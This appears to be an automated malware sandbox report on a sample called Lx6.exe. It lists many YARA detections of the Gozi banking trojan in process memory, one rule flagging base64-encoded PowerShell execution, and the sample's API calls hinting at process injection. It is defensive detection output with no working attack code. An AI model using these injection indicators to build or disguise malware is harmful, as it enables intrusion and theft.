Source: 00000059.00000002.827171942.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000023.00000003.683052464.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000003E.00000003.767821170.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.344972569.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.344972569.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000023.00000003.682539634.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.345107606.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.345107606.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000023.00000003.682736014.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000002D.00000003.712982128.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000043.00000002.778497815.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000058.00000003.814713525.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000013.00000002.860622856.000002240CD02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.345011461.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.345011461.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000059.00000003.822550991.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000029.00000003.705598553.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000059.00000003.822358925.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000002D.00000002.856230458.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000029.00000003.705458137.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000023.00000003.682832881.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000043.00000003.775181381.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000058.00000003.803740044.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.451792745.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.344881693.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.344881693.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.344788105.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.344788105.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000029.00000003.708468891.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000043.00000003.775368587.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000023.00000003.682410000.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000002.498174750.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000002.498174750.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000001B.00000002.858783348.000001D023E02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000023.00000003.682621929.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.442938704.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000003E.00000002.795032491.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: Lx6.exe PID: 1172, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: Process Memory Space: Lx6.exe PID: 1172, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 4292, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 4292, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: RuntimeBroker.exe PID: 3124, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: RuntimeBroker.exe PID: 4372, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: RuntimeBroker.exe PID: 4552, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: cmd.exe PID: 5832, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: cmd.exe PID: 1920, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 6064, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6064, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: csc.exe PID: 5836, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: cvtres.exe PID: 1716, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: csc.exe PID: 3536, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: cvtres.exe PID: 5240, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_004015CB GetProcAddress,NtCreateSection,memset,
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_0040182B NtMapViewOfSection,
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_00401673 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_007541C8 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_0076D196 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,
